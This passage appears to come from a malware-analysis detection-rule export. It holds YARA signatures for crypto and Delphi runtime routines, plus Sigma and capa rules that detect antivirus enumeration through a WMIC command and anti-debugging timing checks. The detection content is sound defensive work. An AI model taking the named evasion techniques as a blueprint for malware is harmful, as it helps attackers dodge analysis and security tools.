00 00 00 51 8B 8C 24 98 00 00 00 8D 54 24 14 56 52 50 51 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_RsaPublicDecrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 RsaPublicDecrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 14 81 EC 84 00 00 00 8B 8C 24 94 00 00 00 56 8B 30 83 C6 07 C1 EE 03 3B CE 76 0D B8 06 04 00 00 5E 81 C4 84 00 00 00 C3 50 8B 84 24 98 00 00 00 51 8D 4C 24 0C 50 8D 54 24 14 51 52 E8 ?? ?? ?? ?? 83 C4 14 85 C0 0F 85 8E 00 00 00 39 74 24 04 74 0D B8 06 04 00 00 5E 81 C4 84 00 00 00 C3 8A 44 24 08 84 C0 75 6E 80 7C 24 09 01 75 67 B8 02 00 00 00 8D 4E FF 3B C8 76 0D B2 FF 38 54 04 08 75 05 40 3B C1 72 F5 8A 4C 04 08 40 84 C9 75 45 8B 94 24 ?? 00 00 00 8B CE 2B C8 89 0A }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_RsaPublicEncrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 RsaPublicEncrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 14 81 EC 84 00 00 00 53 8B 9C 24 98 00 00 00 57 8B 38 83 C7 07 8D 4B 0B C1 EF 03 3B CF 76 0E 5F B8 06 04 00 00 5B 81 C4 84 00 00 00 C3 8B D7 55 2B D3 56 BE 02 00 00 00 C6 44 24 14 00 8D 6A FF C6 44 24 15 02 3B EE 76 28 8B 84 24 AC 00 00 00 8D 4C 24 13 50 6A 01 51 E8 ?? ?? ?? ?? 8A 44 24 1F 83 C4 0C 84 C0 74 E1 88 44 34 14 46 3B F5 72 D8 8B 94 24 A0 00 00 00 53 8D 44 34 19 52 50 C6 44 34 20 00 E8 ?? ?? ?? ?? 8B 8C 24 B4 00 00 00 8B 84 24 A8 00 00 00 51 8B 8C 24 A8 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaEuro_NN_modInv\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaEuro NN_modInv\"\r\n\tstrings:\r\n\t\t$c0 = { 81 EC A4 04 00 00 53 56 8B B4 24 BC 04 00 00 57 8D 44 24 0C 56 50 E8 ?? ?? ?? ?? 8D 8C 24 1C 01 00 00 BF 01 00 00 00 56 51 89 7C 24 1C E8 ?? ?? ?? ?? 8B 94 24 C8 04 00 00 56 8D 84 24 AC 01 00 00 52 50 E8 ?? ?? ?? ?? 8B 9C 24 D8 04 00 00 56 8D 8C 24 B0 00 00 00 53 51 E8 ?? ?? ?? ?? 8D 94 24 B8 00 00 00 56 52 E8 ?? ?? ?? ?? 83 C4 30 85 C0 0F 85 F8 00 00 00 8D 84 24 ?? 00 00 00 56 50 8D 8C 24 A0 01 00 00 56 8D 94 24 AC 02 00 00 51 8D 84 24 34 03 00 00 52 50 E8 ?? ?? ?? ?? 8D 8C }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaEuro_NN_modMult\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaEuro NN_modMult\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 0C 8B 4C 24 08 81 EC 08 01 00 00 8D 54 24 00 56 8B B4 24 20 01 00 00 56 50 51 52 E8 ?? ?? ?? ?? 8B 84 24 2C 01 00 00 56 8D 0C 36 50 8B 84 24 28 01 00 00 8D 54 24 1C 51 52 50 E8 ?? ?? ?? ?? 83 C4 24 5E 81 C4 08 01 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Miracl_Big_constructor\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl Big constructor\"\r\n\tstrings:\r\n\t\t$c0 = { 56 8B F1 6A 00 E8 ?? ?? ?? ?? 83 C4 04 89 06 8B C6 5E C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Miracl_mirvar\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl mirvar\"\r\n\tstrings:\r\n\t\t$c0 = { 56 E8 ?? ?? ?? ?? 8B 88 18 02 00 00 85 C9 74 04 33 C0 5E C3 8B 88 8C 00 00 00 85 C9 75 0E 6A 12 E8 ?? ?? ?? ?? 83 C4 04 33 C0 5E C3 8B 80 38 02 00 00 6A 01 50 E8 ?? ?? ?? ?? 8B F0 83 C4 08 85 F6 75 02 5E C3 8D 46 04 8B C8 8B D0 83 E1 03 2B D1 83 C2 08 89 10 8B 44 24 08 85 C0 74 0A 56 50 E8 ?? ?? ?? ?? 83 C4 08 8B C6 5E C3 }\r\n\t\t$c1 = { 56 57 E8 ?? ?? ?? ?? 8B F0 8B 86 2C 02 00 00 85 C0 74 05 5F 33 C0 5E C3 8B 56 1C 42 8B C2 89 56 1C 83 F8 18 7D 17 C7 44 86 20 17 00 00 00 8B 86 40 02 00 00 85 C0 74 05 E8 ?? ?? ?? ?? 8B 86 8C 00 00 00 85 C0 75 16 6A 12 E8 ?? ?? ?? ?? 8B 46 1C 83 C4 04 48 89 46 1C 5F 33 C0 5E C3 8B 46 18 6A 01 8D 0C 85 0C 00 00 00 51 E8 ?? ?? ?? ?? 8B F8 83 C4 08 85 FF 75 0C 8B 46 1C 5F 48 89 46 1C 33 C0 5E C3 8D 47 04 8B D0 8B C8 83 E2 03 2B CA 83 C1 08 89 08 8B 44 24 0C 85 C0 74 0A 57 50 E8 }\r\n\t\t$c2 = { 56 57 E8 ?? ?? ?? ?? 8B F0 8B 86 18 02 00 00 85 C0 74 05 5F 33 C0 5E C3 8B 56 1C 42 8B C2 89 56 1C 83 F8 18 7D 17 C7 44 86 20 17 00 00 00 8B 86 2C 02 00 00 85 C0 74 05 E8 ?? ?? ?? ?? 8B 86 8C 00 00 00 85 C0 75 16 6A 12 E8 ?? ?? ?? ?? 8B 46 1C 83 C4 04 48 89 46 1C 5F 33 C0 5E C3 8B 86 A4 02 00 00 6A 01 50 E8 ?? ?? ?? ?? 8B F8 83 C4 08 85 FF 75 0C 8B 46 1C 5F 48 89 46 1C 33 C0 5E C3 8D 47 04 8B C8 8B D0 83 E1 03 2B D1 83 C2 08 89 10 8B 44 24 0C 85 C0 74 0A 57 50 E8 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Miracl_mirsys_init\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl mirsys init\"\r\n\tstrings:\r\n\t\t$c0 = { 53 55 57 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 DB A3 ?? ?? ?? ?? 3B C3 75 06 5F 5D 33 C0 5B C3 89 58 1C A1 ?? ?? ?? ?? BD 01 00 00 00 89 58 20 A1 ?? ?? ?? ?? 8B 50 1C 42 89 50 1C A1 ?? ?? ?? ?? 8B 48 1C C7 44 88 20 1D 00 00 00 8B 15 ?? ?? ?? ?? 89 9A 14 02 00 00 A1 ?? ?? ?? ?? 89 98 70 01 00 00 8B 0D ?? ?? ?? ?? 89 99 78 01 00 00 8B 15 ?? ?? ?? ?? 89 9A 98 01 00 00 A1 ?? ?? ?? ?? 89 58 14 8B 44 24 14 3B C5 0F 84 6C 05 00 00 3D 00 00 00 80 0F 87 61 05 00 00 50 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n/* //gives many false positives sorry Storm Shadow\r\nrule x509_public_key_infrastructure_cert\r\n{\tmeta:\r\n\t\tdesc = \"X.509 PKI Certificate\"\r\n\t\text = \"crt\"\r\n\tstrings:\r\n\t\t$c0 = { 30 82 ?? ?? 30 82 ?? ?? }\r\n\tcondition: \r\n\t\t$c0\r\n}\r\n\r\nrule pkcs8_private_key_information_syntax_standard\r\n{\tmeta:\r\n\t\tdesc = \"Found PKCS #8: Private-Key\"\r\n\t\text = \"key\"\r\n\tstrings: \r\n\t\t$c0 = { 30 82 ?? ?? 02 01 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n*/\r\n\r\nrule BASE64_table {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Base64 table\"\r\n\t\tdate = \"2015-07\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Delphi_Random {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Random function\"\r\n\t\tdate = \"2015-08\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 31 DB 69 93 ?? ?? ?? ?? 05 84 08 08 42 89 93 ?? ?? ?? ?? F7 E2 89 D0 5B C3 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 8B 05 ?? ?? ?? ?? 69 C0 05 84 08 08 83 C0 01 89 05 ?? ?? ?? ?? 8B C9 8B C0 48 0F AF C8 48 C1 E9 20 89 C8 C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_RandomRange {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for RandomRange function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 56 8B F2 8B D8 3B F3 7D 0E 8B C3 2B C6 E8 ?? ?? ?? ?? 03 C6 5E 5B C3 8B C6 2B C3 E8 ?? ?? ?? ?? 03 C3 5E 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Delphi_FormShow {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Form.Show function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 8B D8 B2 01 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 5B C3 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 53 48 83 EC 20 48 89 CB 48 89 D9 B2 01 E8 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 83 C4 20 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_CompareCall {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Compare string function\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 57 89 C6 89 D7 39 D0 0F 84 8F 00 00 00 85 F6 74 68 85 FF 74 6B 8B 46 FC 8B 57 FC 29 D0 77 02 01 C2 52 C1 EA 02 74 26 8B 0E 8B 1F 39 D9 75 58 4A 74 15 8B 4E 04 8B 5F 04 39 D9 75 4B 83 C6 08 83 C7 08 4A 75 E2 EB 06 83 C6 04 83 C7 04 5A 83 E2 03 74 22 8B 0E 8B 1F 38 D9 75 41 4A 74 17 38 FD 75 3A 4A 74 10 81 E3 00 00 FF 00 81 E1 00 00 FF 00 39 D9 75 27 01 C0 EB 23 8B 57 FC 29 D0 EB 1C 8B 46 FC 29 D0 EB 15 5A 38 D9 75 10 38 FD 75 0C C1 E9 10 C1 EB 10 38 D9 75 02 38 FD 5F 5E 5B C3 }\r\n\t\t//newer delphi\r\n\t\t$c1 = { 39 D0 74 30 85 D0 74 22 8B 48 FC 3B 4A FC 75 24 01 C9 01 C8 01 CA F7 D9 53 8B 1C 01 3B 1C 11 75 07 83 C1 04 78 F3 31 C0 5B C3}\r\n\t\t//x64\r\n\t\t$c2 = { 41 56 41 55 57 56 53 48 83 EC 20 48 89 D3 48 3B CB 75 05 48 33 C0 EB 74 48 85 C9 75 07 8B 43 FC F7 D8 EB 68 48 85 DB 75 05 8B 41 FC EB 5E 8B 79 FC 44 8B 6B FC 89 FE 41 3B F5 7E 03 44 89 EE E8 ?? ?? ?? ?? 49 89 C6 48 89 D9 E8 ?? ?? ?? ?? 48 89 C1 85 F6 7E 30 41 0F B7 06 0F B7 11 2B C2 85 C0 75 29 83 FE 01 74 1E 41 0F B7 46 02 0F B7 51 02 2B C2 85 C0 75 15 49 83 C6 04 48 83 C1 04 83 EE 02 85 F6 7F D0 90 8B C7 41 2B C5 48 83 C4 20 5B 5E 5F 41 5D 41 5E C3 }\r\n \tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_Copy {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Copy function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 85 C0 74 2D 8B 58 FC 85 DB 74 26 4A 7C 1B 39 DA 7D 1F 29 D3 85 C9 7C 19 39 D9 7F 11 01 C2 8B 44 24 08 E8 ?? ?? ?? ?? EB 11 31 D2 EB E5 89 D9 EB EB 8B 44 24 08 E8 ?? ?? ?? ?? 5B C2 04 00 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 53 48 83 EC 20 48 89 CB 44 89 C0 48 33 C9 48 85 D2 74 03 8B 4A FC 83 F8 01 7D 05 48 33 C0 EB 09 83 E8 01 3B C1 7E 02 89 C8 45 85 C9 7D 05 48 33 C9 EB 0A 2B C8 41 3B C9 7E 03 44 89 C9 49 89 D8 48 63 C0 48 8D 14 42 89 C8 4C 89 C1 41 89 C0 E8 ?? ?? ?? ?? 48 89 D8 48 83 C4 20 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_IntToStr {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for IntToStr function\"\r\n\t\tdate = \"2016-04\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 00 FF FF FF 53 56 8B F2 8B D8 FF 75 0C FF 75 08 8D 85 00 FF FF FF E8 ?? ?? ?? ?? 8D 95 00 FF FF FF 8B C6 E8 ?? ?? ?? ?? EB 0E 8B 0E 8B C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 06 E8 ?? ?? ?? ?? 33 D2 8A D3 3B C2 72 E3 5E 5B 8B E5 5D C2 08 00 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 53 48 83 EC 20 48 89 CB 48 85 D2 7D 10 48 89 D9 48 F7 DA 41 B0 01 E8 ?? ?? ?? ?? EB 0B 48 89 D9 4D 33 C0 E8 ?? ?? ?? ?? 48 89 D8 48 83 C4 20 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\n\r\nrule Delphi_StrToInt {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for StrToInt function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 83 C4 F4 8B D8 8B D4 8B C3 E8 ?? ?? ?? ?? 8B F0 83 3C 24 00 74 19 89 5C 24 04 C6 44 24 08 0B 8D 54 24 04 A1 ?? ?? ?? ?? 33 C9 E8 ?? ?? ?? ?? 8B C6 83 C4 0C 5E 5B C3 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 55 56 53 48 83 EC 40 48 8B EC 48 89 CB 48 89 D9 48 8D 55 3C E8 ?? ?? ?? ?? 89 C6 83 7D 3C 00 74 1B 48 89 5D 20 C6 45 28 11 48 8B 0D ?? ?? ?? ?? 48 8D 55 20 4D 33 C0 E8 ?? ?? ?? ?? 89 F0 48 8D 65 40 5B 5E 5D C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_DecodeDate {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DecodeDate (DecodeDateFully) function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E8 53 56 89 4D F4 89 55 F8 89 45 FC 8B 5D 08 FF 75 10 FF 75 0C 8D 45 E8 E8 ?? ?? ?? ?? 8B 4D EC 85 C9 7F 24 8B 45 FC 66 C7 00 00 00 8B 45 F8 66 C7 00 00 00 8B 45 F4 66 C7 00 00 00 66 C7 03 00 00 33 D2 E9 F2 00 00 00 8B C1 BE 07 00 00 00 99 F7 FE 42 66 89 13 49 66 BB 01 00 81 F9 B1 3A 02 00 7C 13 81 E9 B1 3A 02 00 66 81 C3 90 01 81 F9 B1 3A 02 00 7D ED 8D 45 F2 50 8D 45 F0 66 BA AC 8E 91 E8 ?? ?? ?? ?? 66 83 7D F0 04 75 0A 66 FF 4D F0 66 81 45 F2 AC 8E 66 6B 45 F0 64 66 03 D8 8D 45 F2 50 8D 4D F0 0F B7 45 F2 66 BA B5 05 E8 ?? ?? ?? ?? 66 8B 45 F0 C1 E0 02 66 03 D8 8D 45 F2 50 8D 4D F0 0F B7 45 F2 66 BA 6D 01 E8 ?? ?? ?? ?? 66 83 7D F0 04 75 0A 66 FF 4D F0 66 81 45 F2 6D 01 66 03 5D F0 8B C3 E8 ?? ?? ?? ?? 8B D0 33 C0 8A C2 8D 04 40 8D 34 C5 ?? ?? ?? ?? 66 B8 01 00 0F B7 C8 66 8B 4C 4E FE 66 89 4D F0 66 8B 4D F2 66 3B 4D F0 72 0B 66 8B 4D F0 66 29 4D F2 40 EB DF 8B 4D FC 66 89 19 8B 4D F8 66 89 01 66 8B 45 F2 40 8B 4D F4 66 89 01 8B C2 5E 5B 8B E5 5D C2 0C 00 }\r\n\t\t//x64\r\n\t\t$c1 = { 55 41 55 57 56 53 48 83 EC 30 48 8B EC 48 89 D3 4C 89 C6 4C 89 CF E8 ?? ?? ?? ?? 48 8B C8 48 C1 E9 20 85 C9 7F 23 66 C7 03 00 00 66 C7 06 00 00 66 C7 07 00 00 48 8B 85 80 00 00 00 66 C7 00 00 00 48 33 C0 E9 19 01 00 00 4C 8B 85 80 00 00 00 41 C7 C1 07 00 00 00 8B C1 99 41 F7 F9 66 83 C2 01 66 41 89 10 83 E9 01 66 41 BD 01 00 81 F9 B1 3A 02 00 7C 14 81 E9 B1 3A 02 00 66 41 81 C5 90 01 81 F9 B1 3A 02 00 7D EC 90 66 BA AC 8E 4C 8D 45 2C 4C 8D 4D 2E E8 ?? ?? ?? ?? 66 83 7D 2C 04 75 0B 66 83 6D 2C 01 66 81 45 2E AC 8E 66 6B 45 2C 64 66 44 03 E8 0F B7 4D 2E 66 BA B5 05 4C 8D 45 2C 4C 8D 4D 2E E8 ?? ?? ?? ?? 48 0F B7 45 2C 03 C0 03 C0 66 44 03 E8 0F B7 4D 2E 66 BA 6D 01 4C 8D 45 2C 4C 8D 4D 2E E8 ?? ?? ?? ?? 66 83 7D 2C 04 75 0B 66 83 6D 2C 01 66 81 45 2E 6D 01 66 44 03 6D 2C 44 89 E9 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 0F B6 D0 48 8D 14 52 48 8D 14 D1 66 B9 01 00 4C 0F B7 C1 4E 0F B7 44 42 FE 66 44 89 45 2C 4C 0F B7 45 2E 66 44 3B 45 2C 72 10 4C 0F B7 45 2C 66 44 29 45 2E 66 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\n\r\nrule Unknown_Random {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Random function\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 52 8B 45 08 69 15 ?? ?? ?? ?? 05 84 08 08 42 89 15 ?? ?? ?? ?? F7 E2 8B C2 5A C9 C2 04 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule VC6_Random {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Random function\"\r\n\t\tdate = \"2016-02\"\r\n\tstrings:\r\n\t\t$c0 = { A1 ?? ?? ?? ?? 69 C0 FD 43 03 00 05 C3 9E 26 00 A3 ?? ?? ?? ?? C1 F8 10 25 FF 7F 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule VC8_Random {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Random function\"\r\n\t\tdate = \"2016-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { E8 ?? ?? ?? ?? 8B 48 14 69 C9 FD 43 03 00 81 C1 C3 9E 26 00 89 48 14 8B C1 C1 E8 10 25 FF 7F 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DCP_RIJNDAEL_Init {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP RijnDael Init\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 51 53 56 57 89 4D FC 8B FA 8B D8 8B 75 08 56 8B D7 8B 4D FC 8B C3 E8 ?? ?? ?? ?? 8B D7 8B 4D FC 8B C3 8B 38 FF 57 ?? 85 F6 75 25 8D 43 38 33 C9 BA 10 00 00 00 E8 ?? ?? ?? ?? 8D 4B 38 8D 53 38 8B C3 8B 30 FF 56 ?? 8B C3 8B 10 FF 52 ?? EB 16 8D 53 38 8B C6 B9 10 00 00 00 E8 ?? ?? ?? ?? 8B C3 8B 10 FF 52 ?? 5F 5E 5B 59 5D C2 04 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DCP_RIJNDAEL_EncryptECB {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP RijnDael EncryptECB\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 57 55 83 C4 B4 89 0C 24 8D 74 24 08 8D 7C 24 28 80 78 30 00 75 16 B9 ?? ?? ?? ?? B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0A 89 0F 8B CA 83 C1 04 8B 09 8D 5F 04 89 0B 8B CA 83 C1 08 8B 09 8D 5F 08 89 0B 83 C2 0C 8B 12 8D 4F 0C 89 11 8B 50 58 83 EA 02 85 D2 0F 82 3B 01 00 00 42 89 54 24 04 33 D2 8B 0F 8B DA C1 E3 02 33 4C D8 5C 89 0E 8D 4F 04 8B 09 33 4C D8 60 8D 6E 04 89 4D 00 8D 4F 08 8B 09 33 4C D8 64 8D 6E 08 89 4D 00 8D 4F 0C 8B 09 33 4C D8 68 8D 5E 0C 89 0B 33 C9 8A 0E 8D 0C 8D }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DCP_BLOWFISH_Init {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP Blowfish Init\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 57 55 8B F2 8B F8 8B CF B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B C3 8B 10 FF 52 34 8B C6 E8 ?? ?? ?? ?? 50 8B C6 E8 ?? ?? ?? ?? 8B D0 8B C3 59 8B 30 FF 56 3C 8B 43 3C 85 C0 79 03 83 C0 07 C1 F8 03 E8 ?? ?? ?? ?? 8B F0 8B D6 8B C3 8B 08 FF 51 40 8B 47 40 8B 6B 3C 3B C5 7D 0F 6A 00 8B C8 8B D6 8B C7 8B 38 FF 57 30 EB 0D 6A 00 8B D6 8B CD 8B C7 8B 38 FF 57 30 8B 53 3C 85 D2 79 03 83 C2 07 C1 FA 03 8B C6 B9 FF 00 00 00 E8 ?? ?? ?? ?? 8B 53 3C 85 D2 79 03 83 C2 07 C1 FA 03 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 5D 5F 5E 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule DCP_BLOWFISH_EncryptCBC {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP Blowfish EncryptCBC\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F0 53 56 57 89 4D F8 89 55 FC 8B D8 80 7B 34 00 75 16 B9 ?? ?? ?? ?? B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D 08 85 FF 79 03 83 C7 07 C1 FF 03 85 FF 7E 56 BE 01 00 00 00 6A 08 8B 45 FC 8B D6 4A C1 E2 03 03 C2 8D 4D F0 8D 53 54 E8 ?? ?? ?? ?? 8D 4D F0 8D 55 F0 8B C3 E8 ?? ?? ?? ?? 8B 55 F8 8B C6 48 C1 E0 03 03 D0 8D 45 F0 B9 08 00 00 00 E8 ?? ?? ?? ?? 8D 53 54 8D 45 F0 B9 08 00 00 00 E8 ?? ?? ?? ?? 46 4F 75 AF 8B 75 08 81 E6 07 00 00 80 79 05 4E 83 CE F8 46 85 F6 74 26 8D 4D F0 8D 53 54 8B C3 E8 ?? ?? ?? ?? 56 8B 4D F8 03 4D 08 2B CE 8B 55 FC 03 55 08 2B D6 8D 45 F0 E8 ?? ?? ?? ?? 8D 45 F0 B9 FF 00 00 00 BA 08 00 00 00 E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 04 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DCP_DES_Init {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP Des Init\"\r\n\t\tdate = \"2016-02\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 51 53 56 57 89 4D FC 8B FA 8B D8 8B 75 08 56 8B D7 8B 4D FC 8B C3 E8 FE F9 FF FF 8B D7 8B 4D FC 8B C3 8B 38 FF 57 5C 85 F6 75 25 8D 43 38 33 C9 BA 08 00 00 00 E8 F3 A9 FA FF 8D 4B 38 8D 53 38 8B C3 8B 30 FF 56 6C 8B C3 8B 10 FF 52 48 EB 16 8D 53 38 8B C6 B9 08 00 00 00 E8 6E A7 FA FF 8B C3 8B 10 FF 52 48 5F 5E 5B 59 5D C2 04 00 }\r\n\t\t$c1 = { 55 8B EC 51 53 56 57 89 4D FC 8B FA 8B D8 8B 75 08 56 8B D7 8B 4D FC 8B C3 E8 EE D4 FF FF 8B D7 8B 4D FC 8B C3 8B 38 FF 57 74 85 F6 75 2B 8D 43 40 B9 FF 00 00 00 BA 08 00 00 00 E8 ?? ?? ?? ?? 8D 4B 40 8D 53 40 8B C3 8B 30 FF 96 84 00 00 00 8B C3 8B 10 FF 52 58 EB 16 8D 53 40 8B C6 B9 08 00 00 00 E8 ?? ?? ?? ?? 8B C3 8B 10 FF 52 58 5F 5E 5B 59 5D C2 04 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\n\r\nrule DCP_DES_EncryptECB {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP Des EncryptECB\"\r\n\t\tdate = \"2016-02\"\r\n\tstrings:\r\n\t\t$c0 = { 53 80 78 ?? 00 75 16 B9 ?? ?? ?? 00 B2 01 A1 ?? ?? ?? 00 E8 ?? ?? ?? FF E8 ?? ?? ?? FF 8D 58 ?? 53 E8 ?? ?? FF FF 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "fingerprint_av",
            "rule": "title: Get antivirus details via WMIC query\r\nstatus: experimental\r\ndescription: Get antivirus details via WMIC query\r\nauthor: Joe Security\r\ndate: 2020-03-27\r\nid: 200069\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:\r\n          CommandLine:\r\n              -'*wmic * path antivirusproduct get displayname*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "gettickcount",
            "rule": "rule:\r\n  meta:\r\n    name: check for time delay via GetTickCount\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::Timing/Delay Check GetTickCount [B0001.032]\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-03.exe_:0x4013d0\r\n  features:\r\n    - and:\r\n      - count(api(kernel32.GetTickCount)): 2 or more"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "hide_copy_melt",
